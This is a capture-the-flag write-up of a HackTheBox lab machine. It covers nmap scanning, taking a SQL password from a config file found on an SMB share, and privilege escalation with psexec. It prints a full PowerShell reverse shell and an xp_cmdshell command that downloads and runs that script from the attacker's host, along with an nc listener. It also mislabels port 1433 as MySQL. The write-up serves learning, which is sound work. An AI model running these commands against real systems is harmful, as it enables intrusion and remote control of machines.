Going to start some hackthebox to learn more stuff. While I have skills in the detection area, working with Netflow and DNS, I don’t have a strong offensive mindset. Perhaps that will be beneficial, thinking in terms of offense to develop a better defense.

Set the ports to scan:

ports=$(nmap -p- –min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d ‘/’ -f 1 | tr ‘\n’ ‘,’ | sed s/,$)

Perfom nmap on the target with the specified ports

nmap -sC -sV -p$ports 10.10.10.27

We can see that ports 135, 139, 445 and 1433 are open

Port 135 is related to RPC service

Ports 139 and 445 are related to SMB service

Port 1433 is related to MySQL service

Connecting to the the SMB service

We call smbclient to list available shares

We then access the backups folder and see what files are inside, and download the file called prod.dtsConfig

Analyzing prod.dtsConfig

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
 </DTSConfiguration> 

We see the password Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc, most likely for our SQL connection

Accessing SQL

Earlier we saw that port 1433 was open, and now we try to connect to it with the found credentials

We use Impacket’s mssqlclient.py to connect to the SQL server

We then check if the user has the role of a sysadmin

Creating a Powershell reverse shell

shell.ps1

Remember to change the IP address to your VPN address

$client = New-Object System.Net.Sockets.TCPClient(<IPADDRESS>,443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 

We use the setup a Python3 webserver to allow our victim to download the shell

python3 -m http.server 80

We then setup a nc listener to wait for the victim to execute the shell script, and call back to us

nc -lvnp 443

We modify our firewall rules to allow the victim to connect to us on port 80 to download the shell, and port 443 for the reverse connection

ufw allow from 10.10.10.27 proto tcp to any port 80,443

Over at the victim end in the SQL server, we run the command to download and execute the shell script

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"

The nc listener should now recieve a connection from the victim to port 443, and you have a shell!

Accessing the user flag

We can list out files, and print out contents of the files. Here, we access the flag in sql_svc user’s Desktop

But we want to get the admin flag.

Getting Admin Flag

Using netcat, we get the Powershell history, and we find that the backups are mounted with administrator, and the password

With that information, we run Impacket’s psexec, and we get the root account

We then navigate to the desktop and grab the flag, and we’re done!